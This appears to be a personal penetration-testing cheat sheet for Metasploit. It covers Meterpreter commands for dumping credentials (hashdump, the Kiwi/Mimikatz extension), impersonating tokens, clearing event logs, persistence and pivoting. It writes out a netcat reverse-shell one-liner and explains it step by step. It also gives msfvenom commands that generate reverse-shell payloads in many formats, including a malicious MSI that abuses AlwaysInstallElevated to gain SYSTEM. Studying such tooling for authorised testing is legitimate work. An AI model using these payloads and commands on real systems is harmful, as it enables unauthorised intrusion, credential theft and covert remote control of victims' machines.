Metasploit Documentation: Scanning and Managing Hosts
Payloads can be divided into:
_separating “shell” from the rest of the payload name, as in
/separating “shell” from the rest of the payload name, as in
Payloads follow the OS/ARCHITECTURE/PAYLOAD (though ARCHITECTURE is not included for 32-bit Windows payloads).
NOTE: Metasploit defaults to sending 32-bit payloads, but an increasing number of things won’t work on a 64-bit system from a 32-bit meterpreter shell. It’s probably best to explicitly set the
payload option to use a 64-bit payload unless you know that you’ll be dealing with a 32-bit system.
List all available payloads using
msfvenom --list payloads or
show payloads from within the Metasploit console.
A specific payload can be set in the Metasploit console use the
set PAYLOAD full/path/to/payload.
If you initially get a native shell, use the
post/multi/manage/shell_to_meterpreter module to upgrade to Meterpeter. (NOTE: shell_to_meterpreter creates a new connection on a new port, by default 4433.)
The Meterpreter reverse shell requires a connection back to msfconsole using multi/handler.
background- background the current session and return to the Metasploit console
clearenv- clears the (Windows) event logs (kinda obvious)
creds_all- dump all user credentials in memory (requires the
download- transfer a file from the target to the attacker
edit- edit a file
getpid- get current process ID
getprivs- display current user privileges
getsystem- attempt to elevate to SYSTEM/root
getuid- get current process user
golden_ticket_create- create a golden ticket (requires the
guid- get session ID
hashdump- dump NTLM hashes from the SAM (Windows-only, requires system privileges); fields are username, RID (the last four digits of the Windows SID, with leading zeros dropped), LM password hash, NTLM password hash
ifconfig- display host network interface information
info- get information about a Meterpreter extension
load- load Meterpreter extension
load kiwi- load Mimikatz extension
migrate- migrate Meterpreter to another process
netstat- display host network connections
portfwd- forward a port on the host
route- mess with the host routing tables
run- run a meterpreter extension
search- search for files
sessions- switch to another (Metasploit) session
shell- drop to system shell (return to Meterpreter using
CTRL + Z)
sysinfo- pull remote system information
upload- transfer a file from the attacker to the target
Meterpreter sessions can be backgrounded using the
background command, and all sessions can be backgrounded using
CTRL + Z. List sessions using the
sessions command, and foreground a session using
session -i #, where
# is the session number.
Potentially useful Metsploit modules to
run from/besides Meterpreter:
post/windows/gather/checkvm- try to determine if we’re in a VM
post/multi/recon/local_exploit_suggester- find possible privilege escalation exploits (can be slow/unreliably on 64-bit architectures)
post/windows/gather/enum_shares- enumerate shares
auxiliary/scanner/smb/smb_enumusers_domain- enumerate SMB domain users (requires existing admin credentials)
post/windows/gather/hashdump- same as the hashdump command, but pushes the hashes into the Metasploit DB
post/windows/gather/smart_hashdump GETSYSTEM=FALSE- same as the hashdump command, but pushes the hashes into the Metasploit DB and ignores system accounts
auxiliary/analyze/crack_windows- sic John the Ripper or Hashcat on NTLM hashes stored in the Metasploit DB
post/windows/manage/enable_rdp- enable RDP access (requires admin privileges)
post/multi/manage/autoroute- manipulate target routing for pivoting
auxiliary/server/socks_proxy- start a SOCKS proxy
exploit/windows/local/persistence- sets up a persistent connection (you probably want to
set STARTUP SYSTEM)… without a password!
NOTE: It is generally more useful to background Meterpreter and then run these commands through the Metasploit console, as within Meterpreter they need to have all options specified on the “run” command line (in the console you can access help, actually see what the options are, etc.).
There seem to be a lot of options for the
auxiliary/server/socks_proxy modules, but I don’t see a way to access them from Meterpreter (it looks like to get help you need to background Meterpreter and use the console).
The advantage of setting up a SOCKS proxy on the target is that you can then use proxychains to route through the target; this can allow you to pivot more deeply into the network that you’re attacking. (You probably want to create a custom proxychains.conf file to do this. Fortunately, /etc/proxychains.conf is well documented.)
load powershell powershell_shell
Don’t try to exit PowerShell - trying to do this produces consistent hangs for me. Instead, background the process with
load kiwi to load up Mimikatz. Sub-commands:
kerberos # Attempt to retrieve kerberos creds livessp # Attempt to retrieve livessp creds mimikatz_command # Run a custom commannd msv # Attempt to retrieve msv creds (hashes) ssp # Attempt to retrieve ssp creds tspkg # Attempt to retrieve tspkg creds wdigest # Attempt to retrieve wdigest creds
load incognito list_tokens -u impersonate_token $DOMAIN\\$USER
Not 100% sure where the “tokens” come from here… Mimikatz, maybe?
I think that Meterpreter is being run directly from memory, and what
migrate is doing is basically creating a new process using the memory of a different application, hopping to that process, and then shutting down the old process.
Reasons to migrate the Meterpreter process:
In particular, harvesting credentials from LSASS requires that Meterpreter be living in a process with the same permissions (NT AUTHORITY/SYSTEM) and architecture as LSASS; migrating Meterpreter can help us realize this. The print spooler service (
spoolsv.exe) is often a good choice, as it runs with elevated permissions, has the same architecture as the system itself, and will restart itself automatically. You can also use
lsass.exe directly if you feel like living dangerously.
Another example is that dumping keystrokes will only work when Meterpreter is attached to a word processor or text editor.
Note that Meterpreter will happily let you migrate from a privileged to an unprivileged process - which may cause you to loose control of the target system! Additionally, migrating Meterpreter will change its current working directory to that of the process it’s attaching to.
Msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts. For example:
# Use Metasploit to generate the code for a remote shell: # msfvenom -p cmd/unix/reverse_netcat \ lhost=$LOCAL_IP lport=$LOCAL_PORT # Spin up a listener using netcat: # nc -lvp $LOCAL_PORT
This will generates code that looks like this:
mkfifo /tmp/qdsrgu; \ nc $LOCAL_IP $LOCAL_PORT 0</tmp/qdsrgu | \ /bin/sh >/tmp/qdsrgu 2>&1; \ rm /tmp/qdsrgu
What’s going on here?
mkfifo /tmp/qdsrgucreates a named pipe at /tmp/qdsrgu.
nc $LOCAL_IP $LOCAL_PORT), direct the contents of the pipe into netcat’s STDIN (
0< /tmp/qdsrgu), pipe the output of netcat to a shell we know probably exists (
| /bin/sh), and finally redirect both STDOUT and STDERR back into the named pipe (
> /tmp/qdsrgu 2>&1).
nc -lvp $LOCAL_PORTlistens for the incoming netcat connection from the remote. Anything we type on STDIN here gets sent to the remote and piped to /bin/sh there. The output of /bin/sh is then sent to the named pipe, which dumps into (the remote) netcat, which then sends the data to the local machine where it ends up on STDOUT.
--list formats to see available encoding formats.
# 32-bit Linux ELF Meterpreter payload # msfvenom -p linux/x86/meterpreter/reverse_tcp \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f elf > rev_shell # 32-bit macOS MACH-O Meterpreter payload # msfvenom -p osx/x86/shell_reverse_tcp \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f macho > rev_shell # 32-bit (?) Windows executable Meterpreter payload # msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f exe > rev_shell.exe # PHP Meterpreter payload # msfvenom -p php/meterpreter_reverse_tcp \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.php # ASP Meterpreter payload # msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f asp > rev_shell.asp # JSP Meterpreter payload # msfvenom -p java/jsp_shell_reverse_tcp \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.jsp # Python Meterpreter payload # msfvenom -p cmd/unix/reverse_python \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.py # Bash Meterpreter payload # msfvenom -p cmd/unix/reverse_bash \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.sh # Perl Meterpreter payload # msfvenom -p cmd/unix/reverse_perl \ LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.pl
System-specific shell codes can also be produced by appropriately varying the
By default, msfvenom produces 64-bit executables when using the
-f exe. This doesn’t work, however, if you’re trying to replace a program in Program Files (x86). In this case, you’ll need to explicitly instruct msfvenom to encode a 32-bit binary using
AlwaysInstallElevated is set to 1 under both of the following registry keys, then MSI installers will run as SYSTEM.
reg query HKCU\Software\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Generate a malicious MSI file with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \ -f msi -o $INSTALLER.msi
Then install on the target to get a shell:
msiexec /quiet /qn /i $INSTALLER.msi
exploit/multi/handler module in Metasploit to catch the shells produced using Msfvenom (note that you’ll need to use
set payload to tell Metasploit what it’s catching!). We can catch both regular reverse shells and Meterpreter sessions this way.